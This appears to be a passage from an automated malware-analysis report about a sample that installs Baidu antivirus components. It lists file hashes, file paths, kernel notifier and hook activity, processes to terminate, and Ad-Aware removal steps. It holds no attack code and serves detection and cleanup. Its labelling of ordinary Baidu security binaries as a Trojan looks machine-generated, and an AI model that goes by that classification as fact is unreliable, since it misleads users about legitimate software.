233c96e5369ef4b58ab606c2b150b65a | c:\Program Files\baidu\BaiduSd\2.1.0.3086\drivers\bd0003.sys |
9156ae112ea0989ef04dfe5e97f17b4e | c:\Program Files\baidu\BaiduSd\2.1.0.3086\hipsengine\BDConfig.dll |
676835dc52b67fc7150e9c6336da6556 | c:\Program Files\baidu\BaiduSd\2.1.0.3086\hipsengine\BDDriverFixer.dll |
a0e2fc0daea50c40aba3c90db558bcce | c:\Program Files\baidu\BaiduSd\2.1.0.3086\hipsengine\BDLogicUtils.dll |
9f1c8cf481b790de9cd2275505dd1bac | c:\Program Files\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMAVCached.dll |
d9cce68f84f576bd244c91fb6df7d73d | c:\Program Files\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMAVEng.dll |
bad438e36d73f20cb60e738fb9974198 | c:\Program Files\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMBase.dll |
89d798adf093aebaf041fd0197ede893 | c:\Program Files\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMDownload.dll |
34615a5c3ad5b59208d57674cb0f26fe | c:\Program Files\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMFrameWork.dll |
dce4321312ff1fc63323d6b6a9f06522 | c:\Program Files\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMLog.dll |
c1ae08fe4bb466d651fdc4d3a943bdeb | c:\Program Files\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMMsg.dll |
d4c2ce04bad7eb4d408118021e85dddb | c:\Program Files\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMNet.dll |
cdb1722edcaf6a211344d80e30f2c295 | c:\Program Files\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMPatchAgent.dll |
06792f4af5c6d9b02be39ada55d2fbd7 | c:\Program Files\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMReport.dll |
ed5776988c1f89b6b3b24a3e174f1218 | c:\Program Files\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMStringUtils.dll |
605fcf4a03fe970725008fdaab511818 | c:\Program Files\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMTinyXml.dll |
6946e725d396a13c44529adbe63c4ecc | c:\Program Files\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMUpdate.dll |
d280f73128561a62e8709fd81faa6097 | c:\Program Files\baidu\BaiduSd\2.1.0.3086\hipsengine\BDPerflog.dll |
0177e3ded91fa30a3514e642c215d277 | c:\Program Files\baidu\BaiduSd\2.1.0.3086\hipsengine\BaiduHips.exe |
af88ec6399f527720b342482e1a03cb8 | c:\Program Files\baidu\BaiduSd\2.1.0.3086\hipsengine\BaiduHipsBugRpt.exe |
92c3bc063c1fc4acf176b8e7364c96d7 | c:\Program Files\baidu\BaiduSd\2.1.0.3086\hipsengine\BaiduHipsIU.dll |
734b342d7091f44c1deeeb8be3313a8c | c:\Program Files\baidu\BaiduSd\2.1.0.3086\hipsengine\BaiduHipsUpdate.exe |
9474fcb760cd07111a05a0159138b9d2 | c:\Program Files\baidu\BaiduSd\2.1.0.3086\hipsengine\DriverManager.dll |
ec1059187b4cd5cf1f3d743a8b2693ff | c:\Program Files\baidu\BaiduSd\2.1.0.3086\hipsengine\TrustAndIso.dll |
ae6b6a43cead19395446ee132b787249 | c:\Program Files\baidu\BaiduSd\2.1.0.3086\hipsengine\bd0001.dll |
1fc801576f8b397276245edf7039b427 | c:\Program Files\baidu\BaiduSd\2.1.0.3086\hipsengine\bd0002.dll |
94e2246531b2e5c3319da7ab79372d2f | c:\Program Files\baidu\BaiduSd\2.1.0.3086\hipsengine\drivers\x64\bd0001.sys |
d1895f7555fff550e20bbf92146e17cf | c:\Program Files\baidu\BaiduSd\2.1.0.3086\hipsengine\drivers\x64\bd0002.sys |
04116475cff6d3305a8233c8342ffa88 | c:\Program Files\baidu\BaiduSd\2.1.0.3086\hipsengine\drivers\x86\bd0001.sys |
c39fa78d836fcc2c62d16bac891394f8 | c:\Program Files\baidu\BaiduSd\2.1.0.3086\hipsengine\drivers\x86\bd0002.sys |
c1813f32fc06301e61efbe211a9ba0b8 | c:\Program Files\baidu\BaiduSd\2.1.0.3086\plugins\bdkv\BDKVVirusPlugins.dll |
d23f519d7040466c22c445ba8dc070cf | c:\Program Files\baidu\BaiduSd\2.1.0.3086\plugins\bdkvrtpplugins\FileMon.dll |
2d0bc8fe5f19a79f57b68fc9f61b9581 | c:\Program Files\baidu\BaiduSd\2.1.0.3086\plugins\bdkvrtpplugins\HIPSClient.dll |
15844bec40eefc0f55dbfcb2b44cfb63 | c:\Program Files\baidu\BaiduSd\2.1.0.3086\plugins\bdkvrtpplugins\PrivacyProtect.dll |
23af09ab60487fb5a8a2eb18c36d77ad | c:\Program Files\baidu\BaiduSd\2.1.0.3086\plugins\bdkvtrayplugins\BDDownLoadProtectPlugin.dll |
9d7de59974d1acb3962ab3ed13b07fd0 | c:\Program Files\baidu\BaiduSd\2.1.0.3086\plugins\bdkvtrayplugins\BDKVRmvDevPlugin.dll |
d05545121c7f40e0c638fc720e28d90d | c:\Program Files\baidu\BaiduSd\2.1.0.3086\plugins\bdkvtrayplugins\BDKVTrayTipsPlugin.dll |
4467b02c43945f67a4f98e9b9da41dd0 | c:\Program Files\baidu\BaiduSd\2.1.0.3086\plugins\bdkvtrayplugins\UserDetectionPlugin.dll |
ea98336db5a7c2da6b313c807e53b07f | c:\Program Files\baidu\BaiduSd\2.1.0.3086\plugins\repairplugins\baidusdRepair.dll |
7dfcbea77e16c3a4b74935b87b129d4e | c:\Program Files\baidu\BaiduSd\2.1.0.3086\uninst.exe |
485de987ac7faa82da2134263249eff0 | c:\Program Files\baidu\BaiduSd\2.1.0.3086\updlog.dll |
ac2583ae7c8e129febe9fb92b814a663 | c:\Program Files\baidu\BaiduSd\2.1.0.3086\websafe\DllInject.dll |
ae9050fccdf1f8cb3755ead6bf6f254a | c:\Program Files\baidu\BaiduSd\2.1.0.3086\websafe\WebMonBHO.dll |
16df69d9edd8b09a6f5be1c8dee939f7 | c:\Program Files\baidu\BaiduSd\2.1.0.3086\websafe\WebMonHook.dll |
47794c331f77bbf0e3087938c7a77d23 | c:\Program Files\baidu\BaiduSd\2.1.0.3086\websafe\WebSafe.dll |
621bdedf43439f422be371e971bd802a | c:\Program Files\baidu\BaiduSd\2.1.0.3086\websafe\WebSafePlugin.dll |
7f67d6cf6dd6ac289fc2255ff02b0833 | c:\Program Files\baidu\BindEx.exe |
ac12c71ef1d4b33819b85c158790d8d1 | c:\Program Files\baidu\unins000.exe |
3e9a33113d663d8bd5ed38858e669652 | c:\WINDOWS\WinSxS\x86_Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_473666fd\ATL80.dll |
75f2a9b695ef3ef22d731f059920f636 | c:\WINDOWS\WinSxS\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_e6967989\msvcm80.dll |
8c53ccd787c381cd535d8dcca12584d8 | c:\WINDOWS\WinSxS\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_e6967989\msvcp80.dll |
1169436ee42f860c7db37a4692b38f0e | c:\WINDOWS\WinSxS\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_e6967989\msvcr80.dll |
34e11d25672bdf576c0bf780ee757ec5 | c:\WINDOWS\system32\drivers\BDArKit.sys |
b6edb1e0321c5f2f75352832ce21b507 | c:\WINDOWS\system32\drivers\BDMWrench.sys |
04116475cff6d3305a8233c8342ffa88 | c:\WINDOWS\system32\drivers\bd0001.sys |
c39fa78d836fcc2c62d16bac891394f8 | c:\WINDOWS\system32\drivers\bd0002.sys |
233c96e5369ef4b58ab606c2b150b65a | c:\WINDOWS\system32\drivers\bd0003.sys |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
Using the driver "%System%\DRIVERS\bd0001.sys" the Trojan controls creation and closing of processes by installing the process notifier.
Using the driver "%System%\DRIVERS\bd0001.sys" the Trojan controls creation and closing of threads by installing the thread notifier.
Using the driver "%System%\DRIVERS\bd0001.sys" the Trojan controls loading executable images into a memory by installing the Load image notifier.
The Trojan installs the following kernel-mode hooks:
ZwUnloadKey
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Scan a system with an anti-rootkit tool.
- Terminate malicious process(es) (How to End a Process With the Task Manager):
F1023_s_30803.exe:780
BaiduHips.exe:3260
BaiduHips.exe:320
netsh.exe:2640
BDKVWsc.exe:2568
BDKVWsc.exe:2668
RegSvr32.exe:2972
RegSvr32.exe:2256
RegSvr32.exe:560
RegSvr32.exe:1232
RegSvr32.exe:2360
bddownloader.exe:2600
bddownloader.exe:3792
G1023_s_70904.exe:3576
%original file name%.exe:716
BaiduSdTray.exe:2844
BaiduAnTray.exe:3824
setup.exe:1056
cacls.exe:1860
MsiExec.exe:548
MsiExec.exe:1968
BaiduAnBugRpt.exe:916
BDASWDeskGuide.exe:228
baiduanTray.exe:3012
BindEx.exe:1568
BindEx.exe:1040
setup.tmp:1976
regsvr32.exe:2652
regsvr32.exe:1520
regsvr32.exe:2920
BDALeakfixer.exe:3188
BaiduAn.exe:3824
BaiduAn.exe:1952
BaiduSdBugRpt.exe:2180
BaiduSdUpdate.exe:2680
BaiduSdUpdate.exe:2228
BaiduAnSvc.exe:3768
BaiduAnSvc.exe:3664
BaiduSdSvc.exe:1500 - Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMPatchAgent.dll (3104 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\BDUDiskGuard.dll (1281 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\FTSysFixer\SysFixerXMLScript.dat (2 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\ad.dll (3361 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BaiduSd.exe (12536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\res\InstallWnd.zip (12536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDCooly.dll (3312 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Skins\Default\BDKVMC.rdb (5520 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\hips_customer.xml (75 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\tips.xml (1 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\TrustAndIso.dll (601 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\bdkvtrayplugins\BDDownLoadProtectPlugin.dll (3073 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\hips_self_enc.xml (1 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\wverify.dat (15019 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BaiduHipsUpdate.exe (37 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\ToastLogo.ico (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\vcrt.msi (22552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDPerflog.dll (10512 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMStringUtils.dll (63 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BSRLib.dat (5064 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Download\bdcomproxy.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDLogicUtils.dll (16864 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\Config\811.dat (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv2.tmp (1287722 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\NetService.ini (615 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\baidusdRepair.dll (6360 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDKVRmvDevPlugin.dll (8560 bytes)
%Program Files%\Common Files\Baidu\BDDownload\108\bddownloader.exe (9605 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BaiduSdUProxy64.exe (4545 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\BDMAVEng.dll (4545 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Skins\Default\BDKVTray\TrayPlugin.rdb (18424 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDDriverFixer.dll (1281 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMNet.dll (5873 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BaiduHipsIU.dll (55 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMSREng.dll (10136 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\CompatibilityChecker.dll (673 bytes)
%Program Files%\Common Files\Baidu\BDDownload\108\bdcomproxy.dll (601 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMPatchAgent.dll (39 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\UserDetectionPlugin.dll (5520 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\systemfile.dat (3 bytes)
%System%\config (576 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\Config\806.dat (3 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BaiduSdUpdate.exe (7385 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\bdkvrtpplugins\HIPSClient.dll (2321 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMWindowsLib.dll (3312 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDPerflog.dll (673 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\monitor_config.dat (559 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\bd0001.dll (601 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\BDKitUtils.dll (601 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\drivers\BDMWrench.sys (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\bd0001.dll (4992 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\Repair_PluginConfig.xml (411 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\KVRtp_PluginConfig.xml (2 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\virus_type.dat (1 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\bduf.dll (2321 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\TrayPluginContainerConfig.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\810.dat (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BaiduSdUpdate.exe (33263 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDKVWsc.exe (13368 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\GetSupplyId.dll (3616 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\bd0002.sys (13168 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BAV\BavFrame.dll (601 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDKVDownloadProtect_x64.dll (673 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\drivers\x86\bd0001.sys (601 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDMWindowsLib.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMLog.dll (1552 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDLogicUtils.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\TrustAndIso.dll (13440 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BaiduHips.exe (8657 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BavScanV.dll (2392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\ToastLogo.ico (12024 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\blacksign.dat (852 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\vatl.msi (673 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\repairplugins\RepairPluginContainerConfig.xml (228 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMSRCore.dll (10136 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\KVFixerConfigMgr.dll (8560 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\804.dat (3 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\websafe\WebMonHook.dll (2105 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\InstallCfg.xml (177 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\bd0002.dll (3073 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\GameNoDisturb.ini (215 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\uninst.exe (6841 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BaiduHipsIU.dll (1856 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMTinyXml.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDUDiskGuard.dll (7192 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDKVDeskBand.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\tuopan.png (3 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMStringUtils.dll (63 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\drivers\x64\bd0001.sys (673 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDPerflog.dll (601 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\hips_self_enc.xml (1 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\bdkvrtpplugins\RtpContainerConfig.xml (818 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\806.dat (3 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDMDownload.dll (2105 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDLogicUtils.dll (673 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\TrustAndIso.dll (601 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDMFrameWork.dll (1425 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDShellExt64.dll (2321 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\hips_customer.xml (75 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\cache_config.dat (469 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\wverify.dat (15019 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BaiduSd.exe (2105 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDMSDWrench.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDKVDeskBand.dll (5064 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMFrameWork.dll (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\NetService.ini (1230 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Skins\Default\TrayDldProtect.rdb (3616 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\drivers\x64\bd0001.sys (673 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMPatchAgent.dll (39 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\bdkvrtpplugins\PrivacyProtect.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\BDMSkin.dll (37727 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\hips_product.xml (291 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BaiduHips.exe (38495 bytes)
%System%\config\system (2566 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\KVInstallHelper.dll (16424 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\websafe\white_list.dat (2105 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Skins\Default\BDKVUpdate.rdb (13584 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\901.dat (8 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\blacksign.dat (852 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\ToastImage.png (5 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch.7z (7433 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\FTSysFixer\SysFixerLuaScript.dat (601 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDLogicUtils.dll (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDArKit.sys (5064 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\SysFixerConfig.dat (1 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMAVCached.dll (1425 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDMNet.dll (6841 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\bdvs.dat (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BavScanH.dll (1856 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\drivers\bd0001.sys (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\bdmp.dat (1552 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\updlog.dll (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\kav_verify.dat (677 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\NetService.ini (615 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\vcrt.msi (4545 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDMSkin.dll (7433 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\RtpContainerConfig.xml (818 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDDownLoadProtectPlugin.dll (16288 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMAVCached.dll (23584 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmsysrepair\BDMSREng.dll (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\monitor_config.dat (559 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\NetService.ini (615 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BaiduSdBugRpt.exe (4545 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\FTSysFixer\SysFixerConfig.dat (1 bytes)
%Documents and Settings%\All Users\Desktop\百度æÂ€毒.lnk (895 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\drivers\BDArKit.sys (673 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Download\dl.dll (14988 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BaiduHipsBugRpt.exe (3361 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\WebMonHook.dll (12088 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\KVMainframe_PluginConfig.xml (1 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMDownload.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\systemfile.dat (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\vatl.msi (6584 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\GCCallbackBind.dll (39 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\Cooly_PluginConfig.xml (726 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMSDWrench.dll (3312 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\DesktopToast.exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMRepMgr.dll (12088 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMTinyXml.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BaiduSdSvc.exe (27704 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\coolyplugins\CoolyContainerConfig.xml (329 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDKVTrayTipsPlugin.dll (6584 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDMUpdate.dll (673 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Skins\Default\TrayPullUpWS.rdb (3616 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDMScriptVM.dll (1281 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\hips_product.xml (291 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDKVVirusPlugins.dll (12088 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\KavUpdate.dll (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\RepairPluginContainerConfig.xml (228 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BAV\Database\bdmp.dat (32 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\kav_verify.dat (677 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\KVRtp_PluginConfig.xml (2 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BAV\BavScanH.dll (49 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\WebSafePlugin.dll (11344 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\uninst.exe (29256 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Skins\Default\TrayPlugin.rdb (9608 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\bd0003.sys (1856 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDMPatchAgent.dll (43 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\hips_self_enc.xml (1 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDMDbSqlite.dll (3361 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\duilib license.txt (1 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMLog.dll (43 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDConfig.dll (3073 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Skins\Default\BDKVTray.rdb (1552 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\drivers\x64\bd0002.sys (673 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\TrustAndIso.dll (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\CoolyContainerConfig.xml (329 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\fm.dat (597 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\DriverManager.dll (8608 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\white_list.dat (12088 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BaiduHipsIU.dll (55 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Skins\Default\BDKVTips.rdb (2392 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BaiduHipsBugRpt.exe (3361 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BaiduSdUProxy64.exe (23936 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BavScanS.dll (2392 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\Config\900.dat (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\Cooly_PluginConfig.xml (726 bytes)
%System%\drivers\bd0003.sys (55 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\systemfile.dat (3 bytes)
